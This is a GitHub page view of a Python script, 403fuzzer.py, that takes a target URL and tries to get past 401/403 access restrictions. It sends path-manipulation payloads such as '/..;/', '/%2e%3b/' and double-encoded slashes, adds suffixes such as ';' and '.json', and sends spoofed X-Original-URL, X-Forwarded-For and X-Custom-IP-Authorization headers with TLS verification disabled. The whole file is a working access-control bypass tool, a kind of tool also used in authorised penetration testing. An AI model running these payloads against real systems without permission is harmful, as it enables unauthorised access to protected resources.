-
Notifications
You must be signed in to change notification settings - Fork 31
/
Copy path403fuzzer.py
84 lines (68 loc) · 2.97 KB
/
403fuzzer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
from datetime import date, datetime
from urllib.parse import urlparse, urlunparse
import sys, argparse, logging, requests
requests.packages.urllib3.disable_warnings()
parser = argparse.ArgumentParser(
description="use this script to fuzz endpoints that return a 401/403"
)
parser.add_argument('--url','-u', action="store", default=None, dest='url',
help="Specify the target URL")
args = parser.parse_args()
if not len(sys.argv) > 1:
parser.print_help()
print()
exit()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"DNT": "1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"}
prefixPayloads = [
'/.;/', '/..;/', '//', '/./', '/.//', '/..//', '/%2e%3b/', '/%2e%2e%3b/',
'%2f/', '/%2f', '%2f%2f', '/%2e/', '/%2e%2f/', '/%2e%2e%2f/', '/%252e%253b/',
'/%252e%252e%253b/', '%252f%252f', '%252f/', '/%252f', '/%252e/', '/%252e%252f/',
'/%252e%252e%252f/']
suffixPayloads = [
';','.html','.json','#', '/%20']
def preAndPost(parsed):
finalUrls = []
### Set up paths with prefix payloads
for h in range(len(pathPieces)):
for p in prefixPayloads:
parsed = parsed._replace(path=path.replace('/' + pathPieces[h], p + pathPieces[h]))
finalUrls.append(urlunparse(parsed))
### Set up paths with suffix payloads
for h in range(len(pathPieces)):
for p in suffixPayloads:
parsed = parsed._replace(path=path.replace(pathPieces[h], pathPieces[h] + p))
finalUrls.append(urlunparse(parsed))
return finalUrls
def sendHeaders(url, path):
headers["X-Original-URL"] = path
resp = requests.get(url, headers=headers, verify=False)
print("Response code: {} Response length: {} Header: X-Original-URL: {}\n".format(resp.status_code, len(resp.text), headers["X-Original-URL"]))
headers.pop("X-Original-URL")
headers["X-Forwarded-For"] = "127.0.0.1"
resp = requests.get(url, headers=headers, verify=False)
print("Response code: {} Response length: {} Header: X-Forwarded-For: {}\n".format(resp.status_code, len(resp.text), headers["X-Forwarded-For"]))
headers.pop("X-Forwarded-For")
headers["X-Custom-IP-Authorization"] = "127.0.0.1"
resp = requests.get(url, headers=headers, verify=False)
print("Response code: {} Response length: {} Header: X-Custom-IP-Authorization: {}\n".format(resp.status_code, len(resp.text), headers["X-Custom-IP-Authorization"]))
headers.pop("X-Custom-IP-Authorization")
def sendFinalPayloads(finalUrls):
for url in finalUrls:
parsed = urlparse(url)
path = parsed.path
resp = requests.get(url, headers=headers, verify=False)
print("Response code: {} Response length: {} Path: {}\n".format(resp.status_code, len(resp.text), path))
url = args.url
parsed = urlparse(url)
path = parsed.path
pathPieces = ' '.join(parsed.path.split('/')).split()
finalUrls = preAndPost(parsed)
sendHeaders(url, path)
sendFinalPayloads(finalUrls)